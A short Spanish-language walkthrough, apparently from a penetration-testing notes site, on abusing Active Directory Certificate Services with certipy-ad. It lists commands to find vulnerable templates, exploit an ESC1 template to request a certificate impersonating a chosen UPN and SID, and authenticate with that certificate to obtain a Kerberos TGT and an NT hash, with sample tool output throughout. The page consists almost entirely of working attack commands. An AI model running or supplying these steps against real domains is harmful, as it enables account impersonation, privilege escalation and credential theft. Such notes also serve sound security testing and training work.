certipy-Ad

Enumerar AD CS :

El atacante se ejecuta certipy findpara descubrir cualquier configuración vulnerable.

certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -text -enabled -hide-admins

Solicitar un certificado :

Supongamos que el resultado de la búsqueda muestra ESC1 en una plantilla que los usuarios del dominio pueden inscribir. El atacante puede intentar explotarlo:

certipy-ad req -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -target 'CA.CORP.LOCAL' -ca 'CORP-CA' -template '<UserTemplate>' -upn '<user>@<domain>' -sid '<sid>'

[*] Requesting certificate via RPC
[*] Request ID is 1
[*] Successfully requested certificate
[*] Got certificate with UPN '<user>@<domain>'
[*] Certificate object SID is '<sid>'
[*] Wrote certificate and private key to '<user>.pfx'

Autenticarse con el certificado:

certipy-ad auth -pfx '<user>.pfx' -dc-ip '<ip>'

[*] Certificate identities:
    SAN UPN: '<user>@<domain>'
    Security Extension SID: '<sid>'
[*] Using principal: '<user>@<dmain>'
[*] Trying to get TGT...
[*] Got TGT
[*] Wrote credential cache to '<user>.ccache'
[*] Trying to retrieve NT hash for '<user>'
[*] Got hash for '<user>@<domain>':
    aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889

PreviousArreglar bloodhound NextSilver Ticket

Last updated 4 months ago